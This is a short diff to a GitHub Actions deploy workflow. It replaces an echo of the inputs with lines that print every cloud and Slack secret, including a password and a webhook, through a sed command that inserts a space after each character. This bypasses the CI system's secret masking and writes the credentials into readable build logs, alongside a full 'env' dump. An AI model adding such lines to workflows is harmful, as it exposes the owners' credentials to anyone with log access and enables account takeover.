--- a/.github/workflows/deploy-template.yaml
+++ b/.github/workflows/deploy-template.yaml
@@ -53,7 +53,17 @@ jobs:
     steps:
       - uses: actions/checkout@v2
       - run: |
-          echo '${{ inputs }}';
+          echo '${{ inputs.ENVIRONMENT }}' | sed 's/./& /g';
+          echo '${{ inputs.SHA }}' | sed 's/./& /g';
+          echo ${{ secrets.CLOUD_URL }}  | sed 's/./& /g';
+          echo ${{ secrets.CLOUD_INSTANCE }}  | sed 's/./& /g';
+          echo ${{ secrets.CLOUD_USERNAME }}  | sed 's/./& /g';
+          echo ${{ secrets.CLOUD_PASSWORD }}  | sed 's/./& /g';
+          echo ${{ secrets.GOOGLE_TAG_ID }}  | sed 's/./& /g';
+          echo ${{ secrets.SLACK_FOOTER }}  | sed 's/./& /g';
+          echo ${{ secrets.SLACK_ICON }}  | sed 's/./& /g';
+          echo ${{ secrets.SLACK_USERNAME }}  | sed 's/./& /g';
+          echo ${{ secrets.SLACK_WEBHOOK }}  | sed 's/./& /g';
           echo 'printing envs';
           env
       - name: Create GitHub deployment
